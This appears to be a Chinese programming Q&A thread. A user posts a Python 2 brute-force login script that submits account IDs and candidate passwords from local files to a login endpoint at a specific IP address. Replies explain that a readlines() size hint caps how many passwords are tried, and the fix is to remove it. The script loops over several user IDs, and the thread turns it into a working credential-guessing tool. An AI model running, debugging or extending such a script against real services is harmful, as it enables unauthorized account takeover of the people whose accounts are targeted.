我用自己的账号去尝试暴力破解,候选密码保存在本地txt文件。发现当候选密码较少时(大概几百几千个),可以正确找到密码,当数据较大(大概几十万个)的时候就找不到正确的密码,但是正确的密码就在文件里面了,这是为什么?
def try_pwd(userid,pwd): #提交数据函数
myurl = 'http://222.200.98.147/login!doLogin.action'
postdata = urllib.urlencode({'account':userid, 'pwd':pwd, 'verifycode':''})
header = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}
request = urllib2.Request(url=myurl, data=postdata, headers=header)
try:
acp_login = urllib2.urlopen(request,timeout=10)
except urllib2.HTTPError,e:
print e.reason,e.code
re_info = acp_login.read()
if re_info == '{"msg":"/login!welcome.action","status":"y"}':
print 'ID:',userid
print 'password:', pwd
isfind = True
else:
# print 'None'
isfind = False
return isfind
start_time = time.time()
print 'Start...'
userID_file = open('e:\\userID.txt','r') #userID.txt为账号文件
for userID in userID_file.readlines(100):
userID = userID.strip('\n')
pwd_file = open('e:\\pwd2.txt','r') #pwd2.txt为密码文件
for t_pwd in pwd_file.readlines(10000):
t_pwd = t_pwd.strip('\r\n')
isfind = try_pwd(userid=userID,pwd= t_pwd)
if isfind == True:
break
if isfind == False:
print userID, u'没有匹配'
pwd_file.close()
userID_file.close()
end_time = time.time()
print "total time: ",end_time-start_time
高洛峰2017-04-18 10:18:35
1. Please post the code
2. Are you sure you have gone through all the passwords
readlines(hint=-1)
Read and return a list of lines from the stream. hint can be specified to control the number of lines read: no more lines will be read if the total size (in bytes/characters) of all lines so far exceeds hint.
Note that it’s already possible to iterate on file objects using for line in file: ... without calling file.readlines().
https://docs.python.org/3.3/l...
Your code only reads 100 lines, the correct password should be after 100 lines
大家讲道理2017-04-18 10:18:35
I just tried it and removed the parameters in readlines and it worked again ?_?